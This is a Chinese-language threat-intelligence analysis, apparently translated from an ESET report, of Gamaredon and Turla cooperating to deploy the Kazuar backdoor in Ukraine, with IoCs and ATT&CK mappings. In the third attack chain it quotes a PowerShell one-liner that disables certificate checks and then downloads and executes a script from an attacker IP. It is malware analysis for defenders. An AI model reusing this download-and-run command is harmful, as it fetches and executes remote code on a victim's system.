俄罗斯两大APT组织Gamaredon与Turla首次联合攻击技术分析

本文详细分析了俄罗斯两大APT组织Gamaredon与Turla首次技术协作的攻击链,包括通过PteroGraphin重启Kazuar后门、使用PteroOdd和PteroPaste部署Kazuar v2的具体技术细节,揭示了FSB关联组织间的工具共享与协作模式。

威胁组织概况

Gamaredon
自2013年起活跃,主要针对乌克兰政府机构。乌克兰安全局(SSU)将其归因于FSB第18中心,该组织与我们发现并命名为InvisiMole的威胁组织存在协作关系。

Turla
又名Snake,是著名的网络间谍组织,自2004年起活跃,可能追溯至1990年代末。被认为隶属于FSB,主要针对欧洲、中亚和中东的高价值目标,如政府和外交实体。

攻击概述

2025年2月,通过ESET遥测数据,我们在乌克兰检测到四起Gamaredon-Turla联合入侵事件。在这些机器上,Gamaredon部署了多种工具(包括PteroLNK、PteroStew、PteroOdd、PteroEffigy和PteroGraphin),而Turla仅部署了Kazuar v3。

在其中一台机器上,我们捕获到有效载荷,显示Turla能够通过Gamaredon植入物发出命令。PteroGraphin被用于重启Kazuar,可能是在Kazuar崩溃或未自动启动后。因此,PteroGraphin很可能被Turla用作恢复方法。

受害者分析

过去18个月中,我们在乌克兰的七台机器上检测到Turla。我们认为Gamaredon在2025年1月入侵了前四台机器,而Turla在2025年2月部署了Kazuar v3。所有案例中,ESET端点产品都是在两次入侵后才安装。

第一条攻击链:重启Kazuar v3

时间线

  • 2025-01-20:Gamaredon在机器上部署PteroGraphin
  • 2025-02-11:Turla在机器上部署Kazuar v3
  • 2025-02-27:PteroGraphin下载PteroOdd
  • 2025-02-27:PteroOdd下载有效载荷,执行Kazuar
  • 2025-02-28:PteroOdd下载另一个有效载荷,同样执行Kazuar

事件详情
PteroGraphin位于%APPDATA%\x86.ps1,是一个通过Telegra.ph提供加密通道的下载器。PteroGraphin包含编辑Telegra.ph页面的令牌,任何知晓此令牌的人都可以操纵内容。

PteroOdd下载的解码命令显示,它首先将受害者计算机名和系统驱动器卷序列号上传到Cloudflare Worker子域,最后通过侧加载执行Kazuar。

Kazuar v3技术特性

Kazuar v3是Kazuar家族的最新分支,是高级C#间谍植入物。相比v2增加了约35%的代码行,引入了额外的网络传输方法:Web Socket和Exchange Web Services。Kazuar v3可以具有三种角色之一(KERNEL、BRIDGE或WORKER),恶意软件功能在这些角色间划分。

第二条攻击链:通过PteroOdd部署Kazuar v2

2025年4月18日,我们检测到PteroOdd样本从Telegra.ph下载有效载荷。下载的脚本包含额外的base64编码脚本,即PowerShell下载器PteroEffigy。

该PowerShell有效载荷从https://eset.ydns[.]eu/scrss.ps1下载并执行另一个有效载荷。scrss.ps1被证实是Turla的Kazuar v2安装程序,表明Gamaredon代表Turla部署了Kazuar。

第三条攻击链:通过PteroPaste部署Kazuar v2

2025年6月5日和6日,我们检测到Gamaredon在乌克兰两台机器上部署Turla植入物。在这两种情况下,Gamaredon的PteroPaste都被捕获试图执行简单的PowerShell脚本。

base64编码字符串是以下PowerShell下载器:

1
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).downloadString('https://91.231.182[.]187/ekrn.ps1');

下载的脚本ekrn.ps1与第二条攻击链中提到的scrss.ps1非常相似,同样投放并安装Kazuar v2。

结论

我们展示了Turla如何利用Gamaredon操作的植入物(PteroGraphin、PteroOdd和PteroPaste)来重启Kazuar v3并在乌克兰多台机器上部署Kazuar v2。我们现在高度确信这两个分别与FSB关联的组织正在合作,Gamaredon为Turla提供初始访问权限。

IoC指标

文件哈希

SHA-1 文件名 检测 描述
7DB790F75829D3E6207D8EC1CBCD3C133F596D67 N/A PowerShell/Pterodo.QB PteroOdd
DA7D5B9AB578EF6487473180B975A4B2701FDA9E scrss.ps1 PowerShell/Turla.AI Kazuar v2安装程序

网络指标

IP 域名 托管提供商 首次出现 详情
N/A lucky-king-96d6.mopig92456.workers[.]dev N/A 2025-02-28 PteroOdd下载的有效载荷中的Cloudflare worker
64.176.173[.]164 eset.ydns[.]eu The Constant Company, LLC 2025-03-01 PteroOdd下载的有效载荷中的C&C服务器

MITRE ATT&CK技术

战术 ID 名称 描述
资源开发 T1583.007 获取基础设施:无服务器 Gamaredon创建Cloudflare workers和Telegra.ph页面
执行 T1059.001 命令和脚本解释器:PowerShell PteroGraphin使用PowerShell开发
持久化 T1574.002 劫持执行流:DLL侧加载 Kazuar加载器使用DLL侧加载
防御规避 T1036.005 伪装:匹配合法名称或位置 Kazuar加载器位于看似合法的目录中
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计